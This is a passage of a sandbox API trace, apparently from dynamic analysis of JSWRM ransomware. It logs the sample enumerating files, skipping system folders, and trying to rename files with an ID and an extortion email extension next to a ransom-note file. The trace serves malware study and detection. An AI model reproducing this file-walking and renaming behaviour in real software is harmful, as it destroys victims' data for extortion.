Flags=0x0, Size=0xb0) returned 0x236800 [0068.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.197] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9962022026569728) returned 0 [0068.197] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.198] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.198] CloseHandle (hObject=0xffffffff) returned 1 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0068.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0068.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.198] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4d71b5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f4d71b5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4fd2ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.199] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2=".") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="..") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="...") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="windows") returned -1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="recovery") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="perflogs") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="documents and settings") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="system volume information") returned -1 [0068.199] lstrcmpiW (lpString1="symbase.xml", lpString2="msocache") returned 1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbase.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbase.xml", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbase.xml", lpUsedDefaultChar=0x0) returned 11 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbase.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbase.xml", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbase.xml", lpUsedDefaultChar=0x0) returned 11 [0068.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0068.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.200] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9961231752584320) returned 0 [0068.200] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.200] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.200] CloseHandle (hObject=0xffffffff) returned 1 [0068.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0068.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0068.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.201] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0068.201] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.201] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0068.201] lstrcmpiW (lpString1="symbols.xml", lpString2=".") returned 1 [0068.201] lstrcmpiW (lpString1="symbols.xml", lpString2="..") returned 1 [0068.201] lstrcmpiW (lpString1="symbols.xml", lpString2="...") returned 1 [0068.201] lstrcmpiW (lpString1="symbols.xml", lpString2="windows") returned -1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="recovery") returned 1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="perflogs") returned 1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="documents and settings") returned 1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="system volume information") returned -1 [0068.202] lstrcmpiW (lpString1="symbols.xml", lpString2="msocache") returned 1 [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbols.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbols.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbols.xml", lpUsedDefaultChar=0x0) returned 11 [0068.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbols.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="symbols.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="symbols.xml", lpUsedDefaultChar=0x0) returned 11 [0068.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.202] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091798758411600) returned 0 [0068.202] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.202] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.202] CloseHandle (hObject=0xffffffff) returned 1 [0068.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0068.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0068.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0068.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.203] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols.xml", cAlternateFileName="")) returned 0 [0068.203] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.203] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="he-IL", cAlternateFileName="")) returned 1 [0068.203] lstrcmpiW (lpString1="he-IL", lpString2=".") returned 1 [0068.203] lstrcmpiW (lpString1="he-IL", lpString2="..") returned 1 [0068.203] lstrcmpiW (lpString1="he-IL", lpString2="...") returned 1 [0068.203] lstrcmpiW (lpString1="he-IL", lpString2="windows") returned -1 [0068.203] lstrcmpiW (lpString1="he-IL", lpString2="recovery") returned -1 [0068.204] lstrcmpiW (lpString1="he-IL", lpString2="perflogs") returned -1 [0068.204] lstrcmpiW (lpString1="he-IL", lpString2="documents and settings") returned 1 [0068.204] lstrcmpiW (lpString1="he-IL", lpString2="$RECYCLE.BIN") returned 1 [0068.204] lstrcmpiW (lpString1="he-IL", lpString2="system volume information") returned -1 [0068.204] lstrcmpiW (lpString1="he-IL", lpString2="msocache") returned -1 [0068.204] RtlAllocateHeap 